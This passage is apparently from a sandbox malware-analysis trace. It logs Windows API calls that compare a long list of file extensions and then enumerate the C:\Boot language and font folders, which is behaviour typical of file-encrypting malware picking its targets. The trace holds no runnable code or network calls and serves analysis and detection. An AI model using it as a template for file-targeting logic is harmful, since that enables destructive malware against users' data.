(lpString=".asc") returned 4 [0033.871] lstrcmpiW (lpString1=".asc", lpString2="") returned 1 [0033.871] lstrlenW (lpString=".ascx") returned 5 [0033.871] lstrcmpiW (lpString1=".ascx", lpString2="") returned 1 [0033.871] lstrlenW (lpString=".asm") returned 4 [0033.871] lstrcmpiW (lpString1=".asm", lpString2="") returned 1 [0033.871] lstrlenW (lpString=".asmx") returned 5 [0033.871] lstrcmpiW (lpString1=".asmx", lpString2="") returned 1 [0033.871] lstrlenW (lpString=".asp") returned 4 [0033.871] lstrcmpiW (lpString1=".asp", lpString2="") returned 1 [0033.871] lstrlenW (lpString=".aspx") returned 5 [0033.871] lstrcmpiW (lpString1=".aspx", lpString2="") returned 1 [0033.871] lstrlenW (lpString=".asr") returned 4 [0033.871] lstrcmpiW (lpString1=".asr", lpString2="") returned 1 [0033.871] lstrlenW (lpString=".asx") returned 4 [0033.871] lstrcmpiW (lpString1=".asx", lpString2="") returned 1 [0033.871] lstrlenW (lpString=".avi") returned 4 [0033.871] lstrcmpiW (lpString1=".avi", lpString2="") returned 1 [0033.871] lstrlenW (lpString=".avs") returned 4 [0033.871] lstrcmpiW (lpString1=".avs", lpString2="") returned 1 [0033.871] lstrlenW (lpString=".backup") returned 7 [0033.871] lstrcmpiW (lpString1=".backup", lpString2="") returned 1 [0033.871] lstrlenW (lpString=".bak") returned 4 [0033.872] lstrcmpiW (lpString1=".bak", lpString2="") returned 1 [0033.872] lstrlenW (lpString=".bay") returned 4 [0033.872] lstrcmpiW (lpString1=".bay", lpString2="") returned 1 [0033.872] lstrlenW (lpString=".bd") returned 3 [0033.872] lstrcmpiW (lpString1=".bd", lpString2="BCD") returned -1 [0033.872] lstrlenW (lpString=".bin") returned 4 [0033.872] lstrcmpiW (lpString1=".bin", lpString2="") returned 1 [0033.872] lstrlenW (lpString=".bmp") returned 4 [0033.872] lstrcmpiW (lpString1=".bmp", lpString2="") returned 1 [0033.872] lstrlenW (lpString=".bz2") returned 4 [0033.872] lstrcmpiW (lpString1=".bz2", lpString2="") returned 1 [0033.872] lstrlenW (lpString=".c") returned 2 [0033.872] lstrcmpiW (lpString1=".c", lpString2="CD") returned -1 [0033.872] lstrlenW (lpString=".cdr") returned 4 [0033.872] lstrcmpiW (lpString1=".cdr", lpString2="") returned 1 [0033.872] lstrlenW (lpString=".cer") returned 4 [0033.872] lstrcmpiW (lpString1=".cer", lpString2="") returned 1 [0033.872] lstrlenW (lpString=".cf") returned 3 [0033.872] lstrcmpiW (lpString1=".cf", lpString2="BCD") returned -1 [0033.872] lstrlenW (lpString=".cfc") returned 4 [0033.872] lstrcmpiW (lpString1=".cfc", lpString2="") returned 1 [0033.872] lstrlenW (lpString=".cfm") returned 4 [0033.872] lstrcmpiW (lpString1=".cfm", lpString2="") returned 1 [0033.872] lstrlenW (lpString=".cfml") returned 5 [0033.872] lstrcmpiW (lpString1=".cfml", lpString2="") returned 1 [0033.872] lstrlenW (lpString=".cfu") returned 4 [0033.872] lstrcmpiW (lpString1=".cfu", lpString2="") returned 1 [0033.872] lstrlenW (lpString=".chm") returned 4 [0033.872] lstrcmpiW (lpString1=".chm", lpString2="") returned 1 [0033.872] lstrlenW (lpString=".cin") returned 4 [0033.872] lstrcmpiW (lpString1=".cin", lpString2="") returned 1 [0033.872] lstrlenW (lpString=".class") returned 6 [0033.872] lstrcmpiW (lpString1=".class", lpString2="") returned 1 [0033.872] lstrlenW (lpString=".clx") returned 4 [0033.873] lstrcmpiW (lpString1=".clx", lpString2="") returned 1 [0033.873] lstrlenW (lpString=".config") returned 7 [0033.873] lstrcmpiW (lpString1=".config", lpString2="") returned 1 [0033.873] lstrlenW (lpString=".cpp") returned 4 [0033.873] lstrcmpiW (lpString1=".cpp", lpString2="") returned 1 [0033.873] lstrlenW (lpString=".cr2") returned 4 [0033.873] lstrcmpiW (lpString1=".cr2", lpString2="") returned 1 [0033.873] lstrlenW (lpString=".crt") returned 4 [0033.873] lstrcmpiW (lpString1=".crt", lpString2="") returned 1 [0033.873] lstrlenW (lpString=".crw") returned 4 [0033.873] lstrcmpiW (lpString1=".crw", lpString2="") returned 1 [0033.873] lstrlenW (lpString=".cs") returned 3 [0033.873] lstrcmpiW (lpString1=".cs", lpString2="BCD") returned -1 [0033.873] lstrlenW (lpString=".css") returned 4 [0033.873] lstrcmpiW (lpString1=".css", lpString2="") returned 1 [0033.873] lstrlenW (lpString=".csv") returned 4 [0033.873] lstrcmpiW (lpString1=".csv", lpString2="") returned 1 [0033.873] lstrlenW (lpString=".cub") returned 4 [0033.873] lstrcmpiW (lpString1=".cub", lpString2="") returned 1 [0033.873] lstrlenW (lpString=".dae") returned 4 [0033.873] lstrcmpiW (lpString1=".dae", lpString2="") returned 1 [0033.873] lstrlenW (lpString=".dat") returned 4 [0033.873] lstrcmpiW (lpString1=".dat", lpString2="") returned 1 [0033.873] lstrlenW (lpString=".db") returned 3 [0033.873] lstrcmpiW (lpString1=".db", lpString2="BCD") returned -1 [0033.873] lstrlenW (lpString=".dbf") returned 4 [0033.873] lstrcmpiW (lpString1=".dbf", lpString2="") returned 1 [0033.873] lstrlenW (lpString=".dbx") returned 4 [0033.873] lstrcmpiW (lpString1=".dbx", lpString2="") returned 1 [0033.873] lstrlenW (lpString=".dc3") returned 4 [0033.873] lstrcmpiW (lpString1=".dc3", lpString2="") returned 1 [0033.873] lstrlenW (lpString=".dcm") returned 4 [0033.873] lstrcmpiW (lpString1=".dcm", lpString2="") returned 1 [0033.873] lstrlenW (lpString=".dcr") returned 4 [0033.873] lstrcmpiW (lpString1=".dcr", lpString2="") returned 1 [0033.874] lstrlenW (lpString=".der") returned 4 [0033.874] lstrcmpiW (lpString1=".der", lpString2="") returned 1 [0033.874] lstrlenW (lpString=".dib") returned 4 [0033.874] lstrcmpiW (lpString1=".dib", lpString2="") returned 1 [0033.874] lstrlenW (lpString=".dic") returned 4 [0033.874] lstrcmpiW (lpString1=".dic", lpString2="") returned 1 [0033.874] lstrlenW (lpString=".dif") returned 4 [0033.874] lstrcmpiW (lpString1=".dif", lpString2="") returned 1 [0033.874] lstrlenW (lpString=".divx") returned 5 [0033.874] lstrcmpiW (lpString1=".divx", lpString2="") returned 1 [0033.874] lstrlenW (lpString=".djvu") returned 5 [0033.874] lstrcmpiW (lpString1=".djvu", lpString2="") returned 1 [0033.874] lstrlenW (lpString=".dng") returned 4 [0033.874] lstrcmpiW (lpString1=".dng", lpString2="") returned 1 [0033.874] lstrlenW (lpString=".doc") returned 4 [0033.874] lstrcmpiW (lpString1=".doc", lpString2="") returned 1 [0033.874] lstrlenW (lpString=".docm") returned 5 [0033.874] lstrcmpiW (lpString1=".docm", lpString2="") returned 1 [0033.874] lstrlenW (lpString=".docx") returned 5 [0033.874] lstrcmpiW (lpString1=".docx", lpString2="") returned 1 [0033.874] lstrlenW (lpString=".dot") returned 4 [0033.874] lstrcmpiW (lpString1=".dot", lpString2="") returned 1 [0033.874] lstrlenW (lpString=".dotm") returned 5 [0033.874] lstrcmpiW (lpString1=".dotm", lpString2="") returned 1 [0033.874] lstrlenW (lpString=".dotx") returned 5 [0033.874] lstrcmpiW (lpString1=".dotx", lpString2="") returned 1 [0033.874] lstrlenW (lpString=".dpx") returned 4 [0033.874] lstrcmpiW (lpString1=".dpx", lpString2="") returned 1 [0033.874] lstrlenW (lpString=".dqy") returned 4 [0033.874] lstrcmpiW (lpString1=".dqy", lpString2="") returned 1 [0033.874] lstrlenW (lpString=".dsn") returned 4 [0033.874] lstrcmpiW (lpString1=".dsn", lpString2="") returned 1 [0033.874] lstrlenW (lpString=".dt") returned 3 [0033.875] lstrcmpiW (lpString1=".dt", lpString2="BCD") returned -1 [0033.875] lstrlenW (lpString=".dtd") returned 4 [0033.875] lstrcmpiW (lpString1=".dtd", lpString2="") returned 1 [0033.875] lstrlenW (lpString=".dwg") returned 4 [0033.875] lstrcmpiW (lpString1=".dwg", lpString2="") returned 1 [0033.875] lstrlenW (lpString=".dwt") returned 4 [0033.875] lstrcmpiW (lpString1=".dwt", lpString2="") returned 1 [0033.875] lstrlenW (lpString=".dx") returned 3 [0033.875] lstrcmpiW (lpString1=".dx", lpString2="BCD") returned -1 [0033.875] lstrlenW (lpString=".dxf") returned 4 [0033.875] lstrcmpiW (lpString1=".dxf", lpString2="") returned 1 [0033.875] lstrlenW (lpString=".edml") returned 5 [0033.875] lstrcmpiW (lpString1=".edml", lpString2="") returned 1 [0033.875] lstrlenW (lpString=".efd") returned 4 [0033.875] lstrcmpiW (lpString1=".efd", lpString2="") returned 1 [0033.875] lstrlenW (lpString=".elf") returned 4 [0033.875] lstrcmpiW (lpString1=".elf", lpString2="") returned 1 [0033.875] lstrlenW (lpString=".emf") returned 4 [0033.875] lstrcmpiW (lpString1=".emf", lpString2="") returned 1 [0033.875] lstrlenW (lpString=".emz") returned 4 [0033.875] lstrcmpiW (lpString1=".emz", lpString2="") returned 1 [0033.875] lstrlenW (lpString=".epf") returned 4 [0033.875] lstrcmpiW (lpString1=".epf", lpString2="") returned 1 [0033.875] lstrlenW (lpString=".eps") returned 4 [0033.875] lstrcmpiW (lpString1=".eps", lpString2="") returned 1 [0033.875] lstrlenW (lpString=".epsf") returned 5 [0033.875] lstrcmpiW (lpString1=".epsf", lpString2="") returned 1 [0033.875] lstrlenW (lpString=".epsp") returned 5 [0033.875] lstrcmpiW (lpString1=".epsp", lpString2="") returned 1 [0033.875] lstrlenW (lpString=".erf") returned 4 [0033.875] lstrcmpiW (lpString1=".erf", lpString2="") returned 1 [0033.875] lstrlenW (lpString=".exr") returned 4 [0033.875] lstrcmpiW (lpString1=".exr", lpString2="") returned 1 [0033.875] lstrlenW (lpString=".f4v") returned 4 [0033.876] lstrcmpiW (lpString1=".f4v", lpString2="") returned 1 [0033.876] lstrlenW (lpString=".fido") returned 5 [0033.876] lstrcmpiW (lpString1=".fido", lpString2="") returned 1 [0033.876] FindFirstFileW (in: lpFileName="C:\\Boot\\cs-CZ\\*", lpFindFileData=0x352f808 | out: lpFindFileData=0x352f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xba8ba0 [0033.877] FindNextFileW (in: hFindFile=0xba8ba0, lpFindFileData=0x352f808 | out: lpFindFileData=0x352f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0033.877] FindNextFileW (in: hFindFile=0xba8ba0, lpFindFileData=0x352f808 | out: lpFindFileData=0x352f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0033.877] FindClose (in: hFindFile=0xba8ba0 | out: hFindFile=0xba8ba0) returned 1 [0033.877] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x2eb0088 | out: hHeap=0xb10000) returned 1 [0033.877] FindNextFileW (in: hFindFile=0xba8b60, lpFindFileData=0x352fa84 | out: lpFindFileData=0x352fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="da-DK", cAlternateFileName="")) returned 1 [0033.877] FindFirstFileW (in: lpFileName="C:\\Boot\\da-DK\\*", lpFindFileData=0x352f808 | out: lpFindFileData=0x352f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xba8ba0 [0033.878] FindNextFileW (in: hFindFile=0xba8ba0, lpFindFileData=0x352f808 | out: lpFindFileData=0x352f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0033.878] FindNextFileW (in: hFindFile=0xba8ba0, lpFindFileData=0x352f808 | out: lpFindFileData=0x352f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0033.878] FindClose (in: hFindFile=0xba8ba0 | out: hFindFile=0xba8ba0) returned 1 [0033.878] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x2eb0088 | out: hHeap=0xb10000) returned 1 [0033.878] FindNextFileW (in: hFindFile=0xba8b60, lpFindFileData=0x352fa84 | out: lpFindFileData=0x352fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="de-DE", cAlternateFileName="")) returned 1 [0033.878] FindFirstFileW (in: lpFileName="C:\\Boot\\de-DE\\*", lpFindFileData=0x352f808 | out: lpFindFileData=0x352f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xba8ba0 [0033.879] FindNextFileW (in: hFindFile=0xba8ba0, lpFindFileData=0x352f808 | out: lpFindFileData=0x352f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0033.879] FindNextFileW (in: hFindFile=0xba8ba0, lpFindFileData=0x352f808 | out: lpFindFileData=0x352f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0033.879] FindClose (in: hFindFile=0xba8ba0 | out: hFindFile=0xba8ba0) returned 1 [0033.879] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x2eb0088 | out: hHeap=0xb10000) returned 1 [0033.879] FindNextFileW (in: hFindFile=0xba8b60, lpFindFileData=0x352fa84 | out: lpFindFileData=0x352fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="el-GR", cAlternateFileName="")) returned 1 [0033.879] FindFirstFileW (in: lpFileName="C:\\Boot\\el-GR\\*", lpFindFileData=0x352f808 | out: lpFindFileData=0x352f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xba8ba0 [0033.879] FindNextFileW (in: hFindFile=0xba8ba0, lpFindFileData=0x352f808 | out: lpFindFileData=0x352f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0033.879] FindNextFileW (in: hFindFile=0xba8ba0, lpFindFileData=0x352f808 | out: lpFindFileData=0x352f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0033.880] FindClose (in: hFindFile=0xba8ba0 | out: hFindFile=0xba8ba0) returned 1 [0033.880] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x2eb0088 | out: hHeap=0xb10000) returned 1 [0033.880] FindNextFileW (in: hFindFile=0xba8b60, lpFindFileData=0x352fa84 | out: lpFindFileData=0x352fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0033.880] FindFirstFileW (in: lpFileName="C:\\Boot\\en-US\\*", lpFindFileData=0x352f808 | out: lpFindFileData=0x352f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xba8ba0 [0033.881] FindNextFileW (in: hFindFile=0xba8ba0, lpFindFileData=0x352f808 | out: lpFindFileData=0x352f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0033.881] FindNextFileW (in: hFindFile=0xba8ba0, lpFindFileData=0x352f808 | out: lpFindFileData=0x352f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x14c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0033.881] FindClose (in: hFindFile=0xba8ba0 | out: hFindFile=0xba8ba0) returned 1 [0033.881] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x2eb0088 | out: hHeap=0xb10000) returned 1 [0033.881] FindNextFileW (in: hFindFile=0xba8b60, lpFindFileData=0x352fa84 | out: lpFindFileData=0x352fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="es-ES", cAlternateFileName="")) returned 1 [0033.881] FindFirstFileW (in: lpFileName="C:\\Boot\\es-ES\\*", lpFindFileData=0x352f808 | out: lpFindFileData=0x352f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xba8ba0 [0033.882] FindNextFileW (in: hFindFile=0xba8ba0, lpFindFileData=0x352f808 | out: lpFindFileData=0x352f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0033.882] FindNextFileW (in: hFindFile=0xba8ba0, lpFindFileData=0x352f808 | out: lpFindFileData=0x352f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0033.882] FindClose (in: hFindFile=0xba8ba0 | out: hFindFile=0xba8ba0) returned 1 [0033.882] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x2eb0088 | out: hHeap=0xb10000) returned 1 [0033.882] FindNextFileW (in: hFindFile=0xba8b60, lpFindFileData=0x352fa84 | out: lpFindFileData=0x352fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0033.882] FindFirstFileW (in: lpFileName="C:\\Boot\\fi-FI\\*", lpFindFileData=0x352f808 | out: lpFindFileData=0x352f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xba8ba0 [0033.883] FindNextFileW (in: hFindFile=0xba8ba0, lpFindFileData=0x352f808 | out: lpFindFileData=0x352f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0033.883] FindNextFileW (in: hFindFile=0xba8ba0, lpFindFileData=0x352f808 | out: lpFindFileData=0x352f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0033.883] FindClose (in: hFindFile=0xba8ba0 | out: hFindFile=0xba8ba0) returned 1 [0033.883] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x2eb0088 | out: hHeap=0xb10000) returned 1 [0033.883] FindNextFileW (in: hFindFile=0xba8b60, lpFindFileData=0x352fa84 | out: lpFindFileData=0x352fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Fonts", cAlternateFileName="")) returned 1 [0033.883] FindFirstFileW (in: lpFileName="C:\\Boot\\Fonts\\*", lpFindFileData=0x352f808 | out: lpFindFileData=0x352f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xba8ba0 [0033.884] FindNextFileW (in: hFindFile=0xba8ba0, lpFindFileData=0x352f808 | 